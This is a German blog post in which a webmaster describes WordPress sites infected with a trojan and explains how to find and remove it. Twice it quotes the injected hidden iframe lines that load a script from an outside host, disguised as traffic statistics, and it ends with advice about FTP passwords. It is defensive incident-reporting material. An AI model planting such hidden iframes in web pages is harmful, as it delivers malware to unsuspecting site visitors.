Rundschreiben per Email sicher senden

Mittlerweile ist es schon beim letzten Zeitgenossen angekommen, wie bequem es ist, Neuigkeiten per Email zu senden. Ich bekomme solche Rundschreiben von Vereinen, Musikerkollegen und Privatleuten. In absehbarer Zeit gibt es niemanden mehr, der nicht per Email erreichbar ist. Dann wird das elektronische Rundschreiben in jedem Verein Standart sein. Viele Versender solcher Nachrichten sind dabei häufig sehr gedankenlos im Umgang mit den Daten ihrer Empfänger.

(mehr…)

Böser Code im WordPress-Blog

Trojaner-Warnungen können Nerven, Zeit und Kopfschmerzen kosten. Auf den von mir verwalteten WordPress-Blogs http://fv-bakum.de und http://feuerwehr-bakum.de schlich sich böser Code ein. Beide laufen auf einem auf einem 1&1-Webspace installierten WordPress-System. Besucher sprachen mich immer wieder darauf an, dass ein Trojaner auf meinen Seiten wäre.

Es handelte sich um den Trojaner „TR/Dldr.HTML.Agent.IS“. Falls Ihr Antivirenprogramm beim Besuch einer Internetseite alarmiert hat, benachrichtigen Sie bitte den Webmaster mit einem Hinweis auf diese Seite. Wie Sie als Webmaster diesen Trojaner aus Ihrem Blog entfernen können, erfahren Sie unten am Ende des Beitrags.

Ich konnte mir dies gar nicht denken, aber weil sich diese Warnungen häuften, beschloss ich der Sache auf den Grund zu gehen. Da ich aus Sicherheitsgründen immer mit dem Firefox-Browser von einem eingeschränkten Nutzerkonto aus ins Internet gehe, hat mich mein Antivirenprogramm Antivir nie vor einem gefährlichen Trojaner gewarnt. Anscheinend mag der den Firefox nicht.

Ich erkundigte zunächst mich im WordPress-Deutschland-Forum. Dort waren die Reaktionen erst ratlos. Ein Trojaner habe man nicht auf meinen Seiten gefunden. Einer fand aber dann doch eine solch gefährliche Warnung. Anscheinend surfen die Spezis in diesem Forum wohl auch nicht mit dem Internet Explorer.

Nun wechselte ich in das Administrationskonto und rief mit dem Internet Explorer 7 beide Seiten auf. Leider ist dies ja immer noch der übliche und ziemliche unsichere Weg des Normalnutzers von Computern in das Internet. Und sofort warnte mich Antivir: Das „Trojanische Pferd TR/Dldr.HTML.Agent.IS“ verlangte den Zugriff auf meinen Rechner. Zur großen Darstellung der Warnung …

Ich hatte bereits Stunden verwandt, um alle Dateien meiner WordPress-Installationen (mit den dazu notwendigen Datensicherungen) auszutauschen. Jedoch war dies erfolglos. Der Trojaner wollte nicht weichen. Nach einigen Rückfragen im WordPressforum stellte sich heraus: Ein böser Code wurde einfach mit einem Verweis auf eine Script-Datei in meinen Beiträgen eingebettet, mit der anscheinend dieser Trojaner in fremde Rechner geschleust wird:

<iframe src=“http://www.wp-stats-php.info/iframe/wp-stats.php“ frameborder=“0″ height=“1″ width=“1″></iframe> oder

<!– Traffic Statistics –> <iframe src=“http://61.155.8.157/iframe/wp-stats.php“ frameborder=“0″ height=“1″ width=“1″></iframe> <!– End Traffic Statistics –>

Wenn man diesen Quellcode liest glaubt man, es handle sich um eine Statistikfunktion von WordPress. Doch da irrt man gewaltig. Die Domains wp-stats-php.info bzw. http://61.155.8.157 sind in   China registriert. Beim Aufruf eines derart infizierten Beitrags wundert man sich, dass die Ladezeit erheblich verlängert wird. In der Statuszeile des Browsers erscheint „wp-stats …info“. Da dies so ähnlich aussieht wie eine interne WordPress-Funktion, schöpft man nicht so schnell Verdacht, dass in diesem Moment ein Trojaner von einer chinesischen Quelle aus dem Rechner eingeschleust wird.

Ein einfacher Blick in den Seitenquelltext eines Beitrags reicht aus, diesen schädlichen Code in den Beiträgen sofort zu entdecken. Selbstverständlich habe ich die „infizierten“ Beiträge sofort entfernt. Bei einem Update der WordPress-Installation werden die Beiträge nicht geändert. Deshalb konnte der schädliche Code beim Auswechseln der WordPress-Dateien auch nicht beseitigt werden sondern nur, indem man die betroffenen Beiträge entfernt.

Der Code versteckt sich im HTML-Code eines Beitrags, welcher nach Erzeugung durch das WordPress-Script in der mysql-Datenbank abgelegt und gespeichert wird. Wird der Beitrag aus der Datenbank abgefragt, wird auch wieder der in der Datenbank abgelegte böswillige und für den normalen Nutzer nicht sichtbare Code im Beitrag hinzugefügt. Der Code versteckt sich also in der Datenbank und nicht direkt in den Script-Dateien von WordPress.

Das gleiche Problem ist übrigens nicht nur bei WordPress-Blogs sondern auch bei Homepages, die mit Joomla verwaltet werden, aufgetreten.

Nur was soll man jetzt noch machen? Wo ist die Sicherheitslücke? Wie kommt dieser böse Quelltext in mein Blog? Wie kann man verhindern, das dieser Code sich so einfach in ein WordPress-Blog schleichen kann? Ich habe alle Dateien der Installation getauscht, meinen Rechner mit dem Antivirenprogramm Antivir gescannt. Nun weiß ich auch nicht, was ich sonst noch so tun kann.

Um den „Trojaner“ aus Ihrem Blog zu löschen, rufen Sie mit Ihrem Browser die Seiten mit Ihren Beiträgen auf. Bei den WordPress-Blogs sind dies standartmäßig die Startseite und bei vielen Beiträgen die weiter gelinkten Fortsetzungsseiten. Nun müssen Sie sich den Quelltext dieser Seite ansehen. Klicken Sie dazu mit der rechten Maustaste auf die Seite und wählen Sie „Quellcode anzeigen“ aus. Der Quellcode wird angezeigt. Schauen Sie nach, in welchem Beitrag der Quellcode

<iframe src=“http://www.wp-stats-php.info/iframe/wp-stats.php“ frameborder=“0″ height=“1″ width=“1″></iframe>“ oder ähnlich, z.B.:

<!– Traffic Statistics –> <iframe src=“http://61.155.8.157/iframe/wp-stats.php“ frameborder=“0″ height=“1″ width=“1″></iframe> <!– End Traffic Statistics –>
vorhanden ist. Melden Sie sich jetzt in Ihren Blog an und löschen Sie den betreffenden Beitrag aus Ihrem Blog. Alternativ können Sie auch nur den böswilligen Code aus dem HTML-Code des befallenen Beitrag entfernen, wenn sie den Beitrag nicht löschen möchten.  Damit haben Sie den Code gelöscht, über den der Trojaner in Ihr Blog eindringt. Für die Folgen bei Anwendung dieses Hinweises übernimmt der Verfasser keinerlei Haftung.

Update 04.04.2009: Die Sicherheitslücke scheint nicht im WordPress-Skript sondern  im FTP:-Protokoll zu liegen. Mit FTP lädt man die Skript-Dateien auf den Server. Anscheinend ist es für die Hacker  möglich, den Zugang zu einem Server zu knacken, wenn er das Zugangsasswort herausfindet.  Dann kann jede Datei auf dem Webserver manipuliert werden. Dies berichtet Florian Flegel in seinem Beitrag  Wer braucht ein AntiVirus-Plugin für WordPress?

Diese Erklärung ist sehr plausibel, zugleich ist dies der Gau des Internets. Denn dann ist jede Website, die auf einem lokalen Webserver gespeichert wird, potentiell manipulierbar. Ich musste diese unangenehme Erfahrung auch bei HTML-Homepages machen. In den Seiten wurde einfach schädlicher Code eingefügt.  Es ist mir immer nach schleierhaft, wie die Angreifer die FTP-Zugangspasswörter, die aus reinen Buchstaben/Zahlenkombinationen bestanden, „errieten“. Flegels Rat zum Schließen dieser Lücke sind „sichere FTP-Passwörter“.

Demnach müssten die drei Passwörter des FTP- Zugangs, der MyQsl-Datenbank und des Zugangs zu WordPress „sicher“ geändert werden, um das System „virendicht zu machen“.  Webmaster aller Länder, wechselt Eure Passwörter! Ist dies wirklich der Schlüssel zum Erfolg?